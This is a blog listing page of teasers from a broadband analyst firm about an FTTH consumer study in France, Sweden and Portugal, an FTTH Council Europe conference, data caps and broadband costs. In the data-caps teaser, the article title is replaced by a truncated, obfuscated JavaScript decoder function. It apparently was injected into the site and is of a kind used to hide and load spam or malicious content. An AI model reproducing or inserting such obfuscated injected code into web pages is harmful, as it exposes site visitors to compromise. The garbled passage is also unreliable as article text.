This is the last webinar of a series of four presenting the results of a 3 country study into FTTH attitudes and perception.
FTTH Consumer Experience in France
This is the third webinar of a series of four presenting the results of a 3 country study into FTTH attitudes and perception.
FTTH Consumer Experience in Sweden
This is the first webinar of a series of four presenting the results of a 3 country study into FTTH attitudes and perception.
FTTH Consumer Experience in Portugal
This is the second webinar of a series of four presenting the results of a 3 country study into FTTH attitudes and perception.
Analyzing Broadband Usage in France and Portugal
Last year Diffraction Analysis worked in collaboration with the FTTH Council Europe on a study analyzing the behavior and attitudes of Swedish Broadb
Interview on Consumer Usage & Attitude Study
During the FTTH Council Conference in Stockholm the speakers were interviewed for a live broadcast in between sessions. While the sessions themselves are not available for public viewing (but can be purchased through a virtual pass, we believe), the interviews
Exciting Stuff at the FTTH Council Europe Conference in Stockholm
Like every year, Diffraction Analysis is an analyst partner of the FTTH Council Europe annual conference which this year takes place in Stockholm on February 19-20th with pre-conference workshops on the 18th.
This year is particularly exciting for us because
Do data caps punish the wrong users? A bandwidth usage reality check
Do data caps punish the wrong users?
In late 2009, Herman Wagter and myself wrote an article entitled “function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8< <2)|(w9>4);w6=((w9&15)< <4)|(we>2);qe=((we&3)< <6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6
Return of the Hog Conundrum
This morning, Ars Technica publishes a really interesting article on the cost structure underlying wireline broadband service